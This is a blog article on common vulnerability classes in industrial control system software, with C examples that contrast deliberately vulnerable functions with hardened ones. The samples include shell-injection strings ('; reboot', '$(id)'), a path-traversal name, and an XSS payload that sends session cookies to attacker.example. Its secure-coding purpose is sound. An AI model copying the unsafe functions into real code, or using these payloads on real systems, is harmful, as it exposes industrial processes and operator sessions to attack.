
Destructive Security Flaws in Industrial Control Systems

September 26, 2016 by Irfan Shakeel

Industrial Control System (ICS) is the umbrella term for the systems that monitor and control industrial processes in the oil and gas, nuclear, power transmission and distribution, manufacturing, chemical, and other industries.

Industrial Control Systems carry security concerns that are hard to tolerate, and securing an ICS is quite different from securing an ordinary information system. It is less about protecting data and more about keeping the process running, and about ensuring that the picture displayed on the control room screen matches what is happening on the plant floor.

There are three major requirements that are important to keep in mind while considering the security aspect of an Industrial Control System. The ICS security objectives are typically prioritized as:

  1. Availability
  2. Integrity
  3. Confidentiality

Violating operational requirements while implementing security features in ICS could cause more damage than a cyber-attack.

In 2015, researchers found and reported 189 vulnerabilities in ICS products, a slight increase from the 181 found in 2014. For more than 25 of them a working exploit was freely available, which makes exploitation trivial, and many others need no exploit code at all to compromise the system, for example a service that accepts anonymous access.


Industrial control systems have become a fertile field for attack-minded researchers and companies. The vulnerability classes below are the ones most often reported, together with the strategies researchers recommend for preventing them.

Buffer Overflow:

Buffer overflow vulnerabilities are the result of programmer error. They usually arise because the programmer considered only what should happen, and what could go wrong by accident, but not what a hostile input can do, such as exceeding the expected input length.

An overflow occurs when a program writes more data into a buffer than the space allocated for it, corrupting whatever lies beyond the buffer and causing abnormal operation. In an ICS this is disastrous because it lets an attacker supply crafted data that modifies program execution, often in the very server that is driving the process.

Buffer overflow is the most widespread kind of vulnerability identified in ICS. The following are example buffer overflow vulnerabilities discovered in ICS products:

  • Heap-based and stack-based buffer overflows allow remote code execution on ICS hosts.
  • Username and password buffer overflows in Web Human-Machine Interface (HMI) Web server.
  • Buffer overflow in ICS Web client.
  • Multiple buffer overflows identified in the network packet parsing application.
  • Buffer overflows in application that accepts command line and process control arguments over the network.
  • Multiple stack-based buffer overflows in communications interface.


A few development practices prevent buffer overflows. All code that handles external input must validate its length before copying it. Adopting secure programming practices, and building code review and testing into the development process, greatly reduces the chance that an application is susceptible to buffer overflow attacks.

Most of the buffer overflows identified were in server applications that process ICS protocol traffic. Bounds checking of all network data, code review, and integrity checking should therefore be implemented.
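The following C example is added here to show the pattern behind most of the overflows listed above; it is not code from the article or from any vendor. The frame layout (one function-code byte, one declared-length byte, then a point tag name) is a hypothetical ICS protocol constructed for the example, and the struct and function names are assumptions. The unsafe parser trusts the length byte from the wire; the hardened parser checks it against both the bytes actually received and the destination buffer before any copy.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed frame layout (hypothetical, not any real ICS protocol):
 *   byte 0      function code
 *   byte 1      declared payload length
 *   bytes 2..   payload (a point tag name, not NUL-terminated on the wire) */
#define TAG_MAX 32

struct request {
    uint8_t function;
    char    tag[TAG_MAX];   /* always NUL-terminated by the safe parser */
};

/* VULNERABLE: trusts the length byte from the wire. A declared length of up to
 * 255 is copied into a 32-byte buffer, the classic overflow in a protocol
 * server. Kept only for comparison; never call it with hostile input. */
int parse_request_unsafe(const uint8_t *frame, size_t frame_len, struct request *out)
{
    if (frame_len < 2)
        return -1;
    out->function = frame[0];
    uint8_t declared = frame[1];
    memcpy(out->tag, frame + 2, declared);   /* no check against TAG_MAX or frame_len */
    out->tag[declared] = '\0';               /* also out of bounds when declared >= TAG_MAX */
    return 0;
}

/* HARDENED: every length that comes from the network is checked against the
 * bytes received (over-read) and the space available (over-write). */
int parse_request_safe(const uint8_t *frame, size_t frame_len, struct request *out)
{
    if (frame == NULL || out == NULL || frame_len < 2)
        return -1;                           /* header incomplete */
    uint8_t declared = frame[1];
    if ((size_t)declared > frame_len - 2)
        return -2;                           /* claims more payload than arrived */
    if (declared >= TAG_MAX)
        return -3;                           /* would not fit with its terminator */
    out->function = frame[0];
    memcpy(out->tag, frame + 2, declared);
    out->tag[declared] = '\0';
    return 0;
}

/* Build a constructed frame: `declared` goes in the length byte, while
 * `payload_bytes` of 'A' are actually present. Returns total frame length. */
size_t make_padded_frame(uint8_t *buf, size_t buf_len, uint8_t function,
                         uint8_t declared, size_t payload_bytes)
{
    if (buf_len < 2 + payload_bytes)
        return 0;
    buf[0] = function;
    buf[1] = declared;
    memset(buf + 2, 'A', payload_bytes);
    return 2 + payload_bytes;
}

int main(void)
{
    struct request req;
    uint8_t frame[300];
    size_t n;

    n = make_padded_frame(frame, sizeof frame, 0x03, 6, 6);
    memcpy(frame + 2, "PUMP01", 6);
    printf("valid:     rc=%d tag=%s\n", parse_request_safe(frame, n, &req), req.tag);

    n = make_padded_frame(frame, sizeof frame, 0x03, 200, 200);  /* 200 bytes for a 32-byte buffer */
    printf("oversized: rc=%d\n", parse_request_safe(frame, n, &req));
    /* parse_request_unsafe(frame, n, &req) here would write 169 bytes past req.tag */

    n = make_padded_frame(frame, sizeof frame, 0x03, 10, 3);     /* claims 10 bytes, delivers 3 */
    printf("truncated: rc=%d\n", parse_request_safe(frame, n, &req));
    return 0;
}
```

The two separate checks matter: a parser that only compares the declared length against the buffer still over-reads a truncated frame, and one that only compares it against the received bytes still overflows a long one.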

Bounds Checking:

The lack of input validation for values that are expected to fall within a certain range, such as array index values, causes unexpected behavior. Insecure coding practice in the development of ICS applications lets an attacker supply unexpected values and thus modify program execution.

For instance, an unvalidated input such as a negative or too-large number can be used as an array index and crash an essential service. Changing a single input value to a negative number or an out-of-range index can take down the ICS communications service, a denial-of-service (DoS) against the process itself.


To stop attackers exploiting the ICS this way, every programmer should be trained in secure coding practices, and every input should be validated against its expected range before it is used. ICS traffic should also be monitored for out-of-range values and integrity violations.
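As an added C example (not from the article), the snippet below shows the negative-index case the section describes. A register index arrives as two big-endian bytes; the register table, wire format and function names are constructed for the example. The unsafe check tests only the upper bound, so a wire value of 0xFFFF decodes to -1 and passes; the hardened check converts to an unsigned type first, so one comparison rejects both negative and too-large indices before memory is touched.

```c
#include <stdint.h>
#include <stdio.h>

#define REG_COUNT 64

/* Constructed holding-register table (hypothetical). Memory before and after
 * it belongs to other parts of the service. */
static int32_t registers[REG_COUNT];

/* The index as it arrives on the wire: two bytes, big-endian. The protocol
 * document may say "0..63", but the attacker controls all sixteen bits. */
int16_t decode_index(const uint8_t *b)
{
    return (int16_t)(((unsigned)b[0] << 8) | b[1]);
}

/* VULNERABLE check: a signed index tested against the upper bound only.
 * 0xFFFF decodes to -1, passes, and indexes one element before the table;
 * 0x8000 decodes to -32768 and lands 128 KiB before it. */
int index_check_unsafe(int16_t idx)
{
    return idx < REG_COUNT;
}

/* HARDENED check: convert to unsigned first, so every negative value becomes
 * a large positive one and a single comparison rejects both directions. */
int index_check_safe(int16_t idx)
{
    return (uint16_t)idx < REG_COUNT;
}

/* Kept only to show where the unsafe check sits; never call it with
 * attacker-controlled bytes. */
int write_register_unsafe(const uint8_t *idx_bytes, int32_t value)
{
    int16_t idx = decode_index(idx_bytes);
    if (!index_check_unsafe(idx))
        return -1;
    registers[idx] = value;           /* idx may be negative here */
    return 0;
}

int write_register_safe(const uint8_t *idx_bytes, int32_t value)
{
    int16_t idx = decode_index(idx_bytes);
    if (!index_check_safe(idx))
        return -1;                    /* rejected before memory is touched */
    registers[idx] = value;
    return 0;
}

int read_register_safe(const uint8_t *idx_bytes, int32_t *out)
{
    int16_t idx = decode_index(idx_bytes);
    if (!index_check_safe(idx))
        return -1;
    *out = registers[idx];
    return 0;
}

int main(void)
{
    /* Constructed wire values: last valid index, one past the end, and two negatives */
    const uint8_t probes[][2] = { {0x00, 0x3f}, {0x00, 0x40}, {0xff, 0xff}, {0x80, 0x00} };
    for (size_t i = 0; i < 4; i++) {
        int16_t idx = decode_index(probes[i]);
        printf("wire %02x%02x -> idx %6d  unsafe_check=%d  safe_check=%d  write rc=%d\n",
               probes[i][0], probes[i][1], idx, index_check_unsafe(idx),
               index_check_safe(idx), write_register_safe(probes[i], 1));
    }
    return 0;
}
```

The same unsigned-comparison idiom applies to any count, offset or index that is parsed from a signed wire field, including 32-bit ones.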

Command Injection

Command injection is a technique an attacker uses to execute arbitrary commands or code through an application. If it is not handled during development, an attacker can inject special characters, such as shell metacharacters, that were never meant to be interpreted, and so run extra commands or disrupt the program. In an industrial control system this is disastrous, because the application performs many crucial tasks.

Command injection vulnerabilities typically occur when:

  • Data enter the application from an untrustworthy source.
  • The data are part of a string that is executed as a command by the application.
  • By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.

There are two types of command injection commonly found in ICS:

  • OS command injection
  • Structured Query Language (SQL) injection

OS command injection executes operating system commands constructed from external input without proper sanitization. SQL injection, in which the input becomes part of a database query, is more common and generally more exposed to attack.


To avoid command injection flaws, use library calls rather than external processes to provide the desired functionality. Where an external process is unavoidable, use a whitelist of acceptable inputs and reject anything that does not strictly conform to the specification.
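The C example below is added to illustrate both recommendations for OS command injection; it is not from the article. The scenario is hypothetical: an HMI diagnostic that pings a PLC address taken from a web form. The unsafe version pastes the address into a shell command line; the hardened version whitelists the characters a hostname or IP literal can contain, refuses a leading "-" so the value cannot be read as an option, and then runs the program through fork/execvp with the address as exactly one argument, so no shell ever parses it.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* VULNERABLE: the untrusted address becomes part of a shell command line.
 * "10.0.0.5; reboot" runs a second command with the HMI's privileges.
 * Returns the string that would be passed to system() so it can be inspected
 * without being executed. */
int build_shell_command_unsafe(const char *target, char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "ping -c 1 %s", target);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
    /* the original code would continue with system(out) */
}

/* HARDENED step 1: whitelist. Only what a hostname or IPv4/IPv6 literal can
 * contain, with a length limit, and no leading '-' (argument injection). */
int target_is_allowed(const char *target)
{
    size_t len = strlen(target);
    if (len == 0 || len > 253)
        return 0;
    if (target[0] == '-')
        return 0;                         /* e.g. "-f" would become a ping option */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)target[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':'))
            return 0;                     /* rejects ; | $ ` space quotes ... */
    }
    return 1;
}

/* HARDENED step 2: no shell. Build an argv and execvp() it; the target is one
 * argument whatever it contains. Returns the child's exit status, or -1 on
 * validation or exec failure. */
int run_ping_safe(const char *target)
{
    if (!target_is_allowed(target))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "1", (char *)target, NULL };
        execvp("ping", argv);             /* returns only on failure; /bin/sh is never involved */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed form inputs: two legitimate, three hostile */
    const char *inputs[] = { "10.0.0.5", "plc-01.plant.local", "10.0.0.5; reboot", "$(id)", "-f" };
    char cmd[256];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        build_shell_command_unsafe(inputs[i], cmd, sizeof cmd);
        printf("%-20s allowed=%d  shell would run: %s\n",
               inputs[i], target_is_allowed(inputs[i]), cmd);
    }
    return 0;
}
```

Note that the whitelist alone is not the fix: execvp with a fixed argv is what removes the shell, and the whitelist then guards the one remaining surface, the target program's own option parsing.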

Cross Site Scripting

Cross-site scripting is a critical vulnerability that allows an attacker to inject script into the web pages generated by a vulnerable web application. The malicious script executes in the client's browser, within the origin of the vulnerable site and with the privileges of the logged-in user, not on the server.

Improper sanitization of data causes cross-site scripting (XSS). An XSS attack is unique in that the web application itself unwittingly delivers the malicious code to the user.

In Industrial Control Systems the most common XSS attack is disclosure of the user's session cookies. XSS can also manipulate cookies, compromise confidential information, disclose end-user files, install Trojan horse programs, or execute malicious code on the end-user system, which is especially dangerous when that system is an operator workstation with access to the ICS.

A script could exploit a vulnerability in the web browser itself, possibly taking over the authorized ICS web client host.


ICS applications should use well-known, tested third-party web servers to serve their web applications. Both the web server and the application should be thoroughly tested for scripting and other vulnerabilities that could lead to exploitation of the system.

The defensive actions to prevent cross-site scripting vulnerability include:

  • ICS Internet access policy.
  • ICS user awareness and training.
  • Coordination of security efforts between corporate IT network and ICS network.
  • Firewall between the ICS network and the information technology network.
  • Up-to-date patches.
  • Web browser and e-mail security.
  • Secure code.
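The C example below is added to make the "secure code" item concrete for an HMI; it is not code from the article. The scenario is hypothetical: a status page renders a row per point, with the point name taken from a configuration database or URL parameter. The unsafe renderer interpolates the name directly; the hardened renderer passes every untrusted value through html_escape() at the moment it is written into HTML, which is the standard output-encoding fix for XSS.

```c
#include <stdio.h>
#include <string.h>

/* VULNERABLE: raw interpolation. A point named "<script>...</script>" becomes
 * part of the page and runs in every operator's browser. */
int render_row_unsafe(const char *tag_name, const char *value, char *out, size_t out_len)
{
    int n = snprintf(out, out_len, "<tr><td>%s</td><td>%s</td></tr>", tag_name, value);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Encode the five characters that change meaning in HTML text and attribute
 * context. Returns bytes written (excluding the NUL) or -1 if out is too small. */
int html_escape(const char *in, char *out, size_t out_len)
{
    size_t o = 0;
    for (const char *p = in; *p; p++) {
        const char *rep;
        char one[2] = { *p, '\0' };
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (o + rl + 1 > out_len)
            return -1;                       /* refuse to truncate an entity */
        memcpy(out + o, rep, rl);
        o += rl;
    }
    out[o] = '\0';
    return (int)o;
}

/* HARDENED: escape every untrusted value where it is written into HTML. */
int render_row_safe(const char *tag_name, const char *value, char *out, size_t out_len)
{
    char t[512], v[512];
    if (html_escape(tag_name, t, sizeof t) < 0 || html_escape(value, v, sizeof v) < 0)
        return -1;
    int n = snprintf(out, out_len, "<tr><td>%s</td><td>%s</td></tr>", t, v);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Constructed malicious point name, as it might be stored in a point database
 * or supplied in a URL parameter (the cookie-theft payload the text describes). */
const char *EVIL_TAG =
    "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";

int main(void)
{
    char row[1024];
    render_row_unsafe(EVIL_TAG, "42", row, sizeof row);
    printf("unsafe: %s\n", row);
    render_row_safe(EVIL_TAG, "42", row, sizeof row);
    printf("safe:   %s\n", row);
    return 0;
}
```

Escaping is context-specific: this table covers HTML text and quoted attributes; a value placed inside a script block or a URL needs the encoding for that context instead.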

Permissions, Privileges, and Access Controls

Permissions, privileges, and access controls define the access levels that allow users to use the system. Because an ICS is a critical system, users should be restricted to the access levels they need. If authorization is poor or weak, an attacker can exploit it to gain unauthorized access to ICS functions, and legitimate users can access data or perform actions they should not be allowed to.

The common causes behind access control and privilege vulnerabilities in industrial control systems include:

  • Access is not restricted to the objects that require it.
  • The ICS protocol allows ICS hosts to read or overwrite files on other hosts, without any logging.
  • Documentation and configuration information is shared freely (read only).
  • A remote user can upload a file to any location on the targeted computer.
  • Arbitrary file upload is allowed on ICS hosts.
  • The remote client is allowed to launch any process.
  • The ICS service allows anonymous access.


ICS vendors should design their systems around the least-privilege concept, which restricts users to what they need and guides them toward using the system securely. Create separate accounts for functions that require different privileges, and ship default configurations that grant only the least privileges necessary for each account type.

Granting each user account the least privilege it needs is the most effective way to avoid this class of vulnerability, and it also makes user activity in the system easier to monitor.
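The C example below is added to show the two design points of this section in code; it is not from the article. The roles, function codes and paths are constructed for a hypothetical ICS service. The unsafe authorizer denies one known-bad combination and allows everything else, so an anonymous client can launch a process or use an undocumented code. The hardened authorizer allows only what each role explicitly needs, denies by default, and records every decision; and even an authorized upload is confined to one directory rather than "any location".

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Constructed roles, lowest privilege first. Anonymous is a real role here so
 * that an unauthenticated session can never be mistaken for a logged-in one. */
enum role { ROLE_ANONYMOUS = 0, ROLE_VIEWER, ROLE_OPERATOR, ROLE_ENGINEER };

/* Constructed function codes (hypothetical protocol) */
enum func {
    FC_READ_POINTS   = 0x01,
    FC_WRITE_POINT   = 0x05,
    FC_READ_CONFIG   = 0x10,
    FC_UPLOAD_FILE   = 0x20,
    FC_START_PROCESS = 0x21
};

/* VULNERABLE: "deny known-bad, allow the rest". Anything not listed, including
 * process launch and codes the author never documented, is allowed to anyone. */
int authorize_unsafe(enum role r, int fc)
{
    if (fc == FC_UPLOAD_FILE && r < ROLE_ENGINEER)
        return 0;
    return 1;
}

/* HARDENED: explicit allow list per role, deny by default, audit every decision. */
struct audit { enum role r; int fc; int allowed; };
static struct audit audit_log[64];
static size_t audit_len;

int authorize_safe(enum role r, int fc)
{
    int allowed = 0;
    switch (fc) {
    case FC_READ_POINTS: allowed = r >= ROLE_VIEWER;   break;
    case FC_WRITE_POINT: allowed = r >= ROLE_OPERATOR; break;
    case FC_READ_CONFIG: allowed = r >= ROLE_ENGINEER; break;
    case FC_UPLOAD_FILE: allowed = r >= ROLE_ENGINEER; break;
    default:             allowed = 0;                  break;  /* FC_START_PROCESS and unknown codes */
    }
    if (audit_len < sizeof audit_log / sizeof audit_log[0])
        audit_log[audit_len++] = (struct audit){ r, fc, allowed };
    return allowed;
}

size_t audit_count(void) { return audit_len; }

/* Confine an upload to base_dir: the client supplies a bare file name made of
 * [A-Za-z0-9._-] that does not start with '.', so "..", hidden files, absolute
 * paths and separators are all rejected. Returns 0 and fills out, or -1. */
int confine_upload_path(const char *base_dir, const char *client_name, char *out, size_t out_len)
{
    size_t len = strlen(client_name);
    if (len == 0 || len > 64 || client_name[0] == '.')
        return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)client_name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return -1;
    }
    int n = snprintf(out, out_len, "%s/%s", base_dir, client_name);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

int main(void)
{
    char path[256];
    printf("anonymous START_PROCESS: unsafe=%d safe=%d\n",
           authorize_unsafe(ROLE_ANONYMOUS, FC_START_PROCESS),
           authorize_safe(ROLE_ANONYMOUS, FC_START_PROCESS));
    printf("engineer  UPLOAD_FILE:   unsafe=%d safe=%d\n",
           authorize_unsafe(ROLE_ENGINEER, FC_UPLOAD_FILE),
           authorize_safe(ROLE_ENGINEER, FC_UPLOAD_FILE));
    printf("upload '../../etc/passwd': rc=%d\n",
           confine_upload_path("/var/lib/hmi/uploads", "../../etc/passwd", path, sizeof path));
    printf("upload 'config_v2.bin':    rc=%d path=%s\n",
           confine_upload_path("/var/lib/hmi/uploads", "config_v2.bin", path, sizeof path), path);
    return 0;
}
```

The audit record is part of the control, not an afterthought: the protocol flaw listed above was not only that hosts could overwrite each other's files but that nothing logged it.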

These vulnerabilities are being exploited by attackers, and developer neglect during the development of an Industrial Control System plays an important role in creating them. Secure programming should therefore be adopted to avoid such vulnerabilities and to build a secure system for critical tasks where there is no tolerance for the system going down or becoming unavailable.


Irfan Shakeel is the founder & CEO of An engineer, penetration tester and a security researcher. He specializes in network and VoIP penetration testing and digital forensics. He is the author of the book titled “Hacking from Scratch”. He loves to provide training and consultancy services, and works as an independent security researcher.